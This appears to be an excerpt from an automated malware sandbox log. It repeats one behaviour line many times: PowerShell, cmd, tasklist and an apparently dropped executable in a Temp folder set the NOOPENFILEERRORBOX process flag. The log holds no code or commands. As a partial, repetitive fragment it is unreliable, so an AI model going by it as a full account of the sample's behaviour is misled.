Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
